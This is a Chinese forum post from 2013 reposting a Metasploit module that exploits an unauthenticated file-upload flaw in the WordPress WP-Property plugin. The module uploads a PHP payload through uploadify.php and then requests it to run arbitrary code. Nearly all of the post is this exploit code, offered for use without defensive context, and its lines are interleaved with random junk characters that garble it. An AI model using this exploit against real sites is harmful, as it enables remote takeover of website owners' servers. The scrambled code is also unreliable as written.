WordPress WP-Property PHP 文件上传漏洞( C, D/ i. z/ u9 W; G
) C" l) v9 t7 p
## # This file is part of the Metasploit Framework and may be subject to
2 }5 y* h$ A9 C7 A L" I, a1 L9 P# a1 \) E9 b$ R
# redistribution and commercial restrictions. Please see the Metasploit- W( ]1 b6 K" J4 b
6 |$ Y3 R0 X% R _# Framework web site for more information on licensing and terms of use.
* {3 B% ~; O" _
0 R7 @: j9 w- o3 x7 o7 k* R% }1 I# http://metasploit.com/framework/ ##
$ s& q9 g4 E. r% f1 J0 e. L( u" K& W- `/ B N* i5 o# ~
$ o/ e% o- O1 R' ~- F( c4 J; m& w" D% K- Q" O( R
9 L" j1 ~+ M( f0 {% s9 _
5 s" ~+ N4 d1 @" v* b+ \1 {% q) S; {require 'msf/core'
3 t7 c3 H& e$ M {4 Z: krequire 'msf/core/exploit/php_exe'
: h( w) w0 |: m5 s" t, m! N4 m& H8 @4 c
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',; A% o! X! j- m9 F5 o0 [# B
'Description' => %q{0 _2 {! c% G2 {3 r7 c% M
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>- n0 _ \2 m9 d1 }. ~7 }
[
" C1 o# J2 m$ S2 S'Sammy FORGIT', # initial discovery1 J6 U; U4 A8 }9 h
'James Fitts <fitts.james[at]gmail.com>' # metasploit module" k2 L+ t$ v5 n2 r$ ?8 Z! x
],( ?5 C7 d$ V! L/ M
'License' => MSF_LICENSE,
! g9 j- { N1 c9 H0 [: x'References' =>
, o# d/ @4 t. M[
, [0 |9 p/ `; q# M& n) H9 S' _[ 'OSVDB', '82656' ],
3 Y. w3 ]; o! d[ 'BID', '53787' ],
1 q8 X* P- O/ b+ \9 g( q- ?+ G[ 'EDB', '18987'],2 s( w5 h8 Q# Q) G0 Z
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]: n- U" u( S' }& j( X4 k& v
],
: R; g6 Y' \9 c9 q0 q5 N'Payload' =>
* Z0 u: O! |! Z+ Q0 ?! ?. m{: s/ t3 ^: D# M6 D
'BadChars' => "\x00",4 V( d, N3 _3 ^: G( ?, G
},
: G( r# T5 x6 Y( i, s3 C9 i1 `'Platform' => 'php',
+ x2 Y/ p; Y [0 O/ M'Arch' => ARCH_PHP,2 H/ N4 O$ o! ]9 A0 C+ s7 f: N* ?
'Targets' =>
$ V- ^6 E0 Z% Y9 Z4 g" d% Z[
. i$ k- O* r" ][ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
: n$ l& z: w4 J7 P' [4 b[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
" _" c: F1 c0 S! e( B9 z& t' ?9 _],, W" H- F0 [ s" d
'DefaultTarget' => 0,$ a( k, `3 c# m2 Z5 ^
'DisclosureDate' => 'Mar 26 2012'))# V5 Z) }( ~# [
: L- c% [. B% V1 @1 I
register_options(1 F4 W* y/ Z$ l5 O" E
[
) @7 r8 g2 b6 Q+ g* X# C) M/ |OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']); A) ^8 p) W/ D( y$ H+ M0 K% L- q
], self.class)
! a- o$ Y# R0 {end2 _- w: H( }9 X% B# K
- E6 c& r5 C5 E2 J- M! O+ p
def check
. [; t5 k$ @/ X# J, I; O! Muri = target_uri.path
* H$ m. e# Z4 V! kuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
0 w N5 n% x" F7 ?! C" z/ L9 ^'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"+ K& }7 r2 R+ I& L2 V4 N
})
9 Y8 F3 @, f% ^5 h3 Y7 p; U
/ R& T5 Q+ s3 L1 dif not res or res.code != 200
, \7 _' d* v" Z! I4 B! Kreturn Exploit::CheckCode::Unknown
8 b i4 a- I* e' [$ hend
1 n& h; f. t/ J! R3 Z4 p; @- Y; c( U0 r1 |4 u' C
return Exploit::CheckCode::Appears
$ E, A8 p2 x& W& `+ R) T8 Uend
7 k8 K" o4 w, Q- }" O5 o
; @/ ^4 K9 C& G! ~% w# A! zdef exploit9 M- j2 @6 c3 e" Z# q
uri = target_uri.path
6 ^7 ?9 k* l4 u* }" [3 M; l* luri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
/ V9 t w& p! ^ l% V
0 p8 m3 x, S5 N' V$ sdata = Rex::MIME::Message.new' F& H2 y8 ?2 [5 s# o1 ~( s
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")! e3 W) w3 n. k* z
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
. t" D# r! K: `! K* s' v+ l* _post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
3 p2 \# j7 v7 ?3 n( K5 @$ y. r
& f. i& T! G; P& Y* I9 Qprint_status("#{peer} - Uploading payload #{@payload_name}")
^& L2 i2 i, l: O+ t" H: [res = send_request_cgi({
5 p& ^8 w% Z3 F" C: d2 ['method' => 'POST',
! R8 ^$ C2 K/ O5 z4 E* I'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
- U. ^) _. C4 i) _. @$ m6 N'ctype' => "multipart/form-data; boundary=#{data.bound}",/ @5 ^+ B J! e8 `% ~
'data' => post_data
1 s# ]3 I$ A4 l/ o})
. r, }. ]9 d6 ^: k7 }% v, H9 G; r; s! \/ |( b% M; N4 s* Z
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
9 b) s9 l# _5 Y: d! `9 A; P! w2 \fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")- q6 _! F# B# I# R% O5 X
end/ k- b w8 g+ _. I' T* Y: y
R w M$ t% S0 ~, B9 aupload_uri = res.body
8 |4 J/ L0 h2 m1 g: C3 f; k2 ~4 [- _9 b+ n
print_status("#{peer} - Executing payload #{@payload_name}")$ @3 k2 w* ~+ H) w: q; s2 Y
res = send_request_raw({
. X6 p# O# ~5 h5 a% V'uri' => upload_uri,0 R) i: m) @) ^7 }
'method' => 'GET'
6 J4 o) s2 [$ D8 k) `3 w& S})# C9 P1 G. j* S* ?) s# |: H
end
6 Y2 r" x3 S7 e, k& qend+ x- N! R* K$ u3 ^, _
4 P& `, R* I* a; p3 f7 v% v6 N不要问我这写的是什么 怎么利用 我是说msf.
$ m6 N, e4 [& [9 w
5 Q& e2 j/ |( k" u$ K* @$ T |
发表于 2013-1-4 19:51:30
收藏
支持
反对